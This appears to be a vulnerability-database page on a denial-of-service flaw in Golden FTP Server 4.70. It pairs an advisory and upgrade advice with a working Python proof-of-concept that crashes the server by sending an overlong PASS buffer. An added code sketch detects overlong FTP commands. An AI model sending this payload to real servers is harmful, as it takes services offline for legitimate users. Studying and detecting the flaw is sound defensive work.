Vendor: Golden FTP Server
By: SecurityFocus
CVSS: 7.8 (HIGH)
Denial of Service
CWE: 400
Product Name: Golden FTP Server
Affected Version From: 4.7
Affected Version To: 4.7
Patch Exists: YES
Related CWE: N/A
CPE: Golden FTP Server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Golden FTP Server Denial of Service Vulnerability

Golden FTP Server is prone to a denial-of-service vulnerability. Exploits will cause the application to crash, denying service to legitimate users. Golden FTP Server 4.70 is vulnerable; other versions may also be affected.

Mitigation:

Upgrade to the latest version of Golden FTP Server

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/45924/info

Golden FTP Server is prone to a denial-of-service vulnerability.

Exploits will cause the application to crash, denying service to legitimate users.

Golden FTP Server 4.70 is vulnerable; other versions may also be affected. 

import socket
import sys
import time

Bs = '\x42' * 4

buffer = '\x41' * 533 + Bs + '\xcc' * 300

if len(sys.argv) != 3:
    print "Usage: ./goldenftp.py <ip> <port>"
    sys.exit()

ip   = sys.argv[1]
port = sys.argv[2]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "[*] Sending evil buffer"
    s.connect((ip,int(port)))
    s.recv(1024)
    time.sleep(2)
    s.send('USER anonymous'+ '\r\n')
    s.recv(1024)
    time.sleep(3)
    s.send('PASS ' + buffer + '\r\n')
    s.recv(1024)
    time.sleep(1)
    s.close()
except:
    print "Can't Connect to Server"
    sys.exit()
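
The script above sends a PASS command whose argument is 837 bytes long (533 + 4 + 300). The following sketch, an added example that is not part of the original advisory or the vendor's code, shows how a proxy or sensor on the FTP control channel could flag such overlong commands. The 512-byte limit, the class and function names and the sample session are assumptions.

```python
# Added example, not part of the original page: flag overlong FTP commands
# on the control channel without ever logging the argument (PASS is a secret).
MAX_LINE_LEN = 512  # assumed policy limit, not a value documented by the vendor


class FtpCommandInspector:
    """Reassembles CRLF-terminated client commands from arbitrary TCP chunks."""

    def __init__(self, max_line_len=MAX_LINE_LEN):
        self.max_line_len = max_line_len
        self.pending = b""      # bytes of the command currently being assembled
        self.skipping = False   # True while discarding the tail of a reported line

    def feed(self, chunk):
        """Consume client-to-server bytes and return the alerts they trigger."""
        alerts = []
        self.pending += chunk
        while b"\n" in self.pending:
            line, self.pending = self.pending.split(b"\n", 1)
            if self.skipping:               # end of a line already reported
                self.skipping = False
            else:
                alerts += self._check(line.rstrip(b"\r"), terminated=True)
        if len(self.pending) > self.max_line_len:
            # No line ending yet and already too long: report once, then
            # drop bytes until the terminator so memory use stays bounded.
            if not self.skipping:
                alerts += self._check(self.pending, terminated=False)
            self.skipping, self.pending = True, b""
        return alerts

    def _check(self, line, terminated):
        if len(line) <= self.max_line_len:
            return []
        verb = line.split(b" ", 1)[0][:8].upper().decode("ascii", "replace")
        return [{"verb": verb, "line_len": len(line), "terminated": terminated}]


def demo(chunk_size=1024):
    """Constructed session: a normal login, then an 837-byte PASS argument."""
    inspector = FtpCommandInspector()
    stream = b"USER anonymous\r\nPASS guest@example.com\r\nPASS " + b"A" * 837 + b"\r\n"
    alerts = []
    for i in range(0, len(stream), chunk_size):   # simulate recv() boundaries
        alerts += inspector.feed(stream[i:i + chunk_size])
    return alerts
```

When the oversized command arrives split across several reads, the alert fires as soon as the unterminated data passes the limit, so `line_len` is then a lower bound rather than the full length.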